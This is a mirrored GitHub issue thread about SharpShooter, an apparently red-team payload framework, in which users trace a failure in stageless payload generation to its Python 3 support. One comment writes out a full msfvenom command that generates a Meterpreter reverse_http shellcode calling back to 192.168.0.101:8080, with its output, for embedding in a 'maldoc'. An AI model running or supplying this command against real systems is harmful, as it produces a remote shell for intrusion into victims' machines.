Code Monkey home page Code Monkey logo

Comments (6)

SSATKINS avatar SSATKINS commented on August 17, 2024

You need the C# byte-formatted output not the raw.

-f csharp is what you need.

HTH

from sharpshooter.

jmhickman avatar jmhickman commented on August 17, 2024

According to the docs in the README, you don't. You use the -f csharp output for staged payloads, not stageless as I'm attempting to make.

In the case of a stageless payload, a raw shellcode file is read file[sic] the file system

Regardless, I tried anyway and got the same error as I got with the -f hex and -f python output.

from sharpshooter.

dmchell avatar dmchell commented on August 17, 2024

Yes you're supposed to use the raw format when using stageless - I'm not able to reproduce your issue though....

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=192.168.0.101 LPORT=8080 EnableStageEncoding=True -f raw > /mnt/hgfs/Tools/Share/x86shellcode.raw
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 375 bytes

root@kali:# file /mnt/hgfs/Tools/Share/x86shellcode.raw
/mnt/hgfs/Tools/Share/x86shellcode.raw: data
root@kali:# strings /mnt/hgfs/Tools/Share/x86shellcode.raw
;}$u
D$$[[aYZQ
]hnet
hwiniThLw&
SSSSSh:Vy
/B87L3p1VYhi8-7365opELQTeH0Q6TBuAxLH
SSSWSVh
_SSSSVh-
192.168.0.101
root@kali:~#

Then in SharpShooter...
[*] Provide path to raw shellcode, e.g. ./sc.raw
/Users/dmc/Tools/Share/x86shellcode.raw

[*] Provide name of output file (e.g. "maldoc")

$ python --version
Python 2.7.10

from sharpshooter.

jmhickman avatar jmhickman commented on August 17, 2024

When I explicitly run SharpShooter.py with the python2 interpreter, the stageless payload creation works as expected.

I note from the latest commits though that py3 support is at least intended, so it seems there's a bug in the python3 support.

from sharpshooter.

dmchell avatar dmchell commented on August 17, 2024

python3 support will need more testing, it was added from a PR - i've only extensively tested on 2.7.

from sharpshooter.

SYANiDE- avatar SYANiDE- commented on August 17, 2024

I found the solution reproducable by using Python2 when invoking Sharpshooter, and using a redirection operator (>) instead of output switch (-o) when generating the payload using msfvenom. HTH

from sharpshooter.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.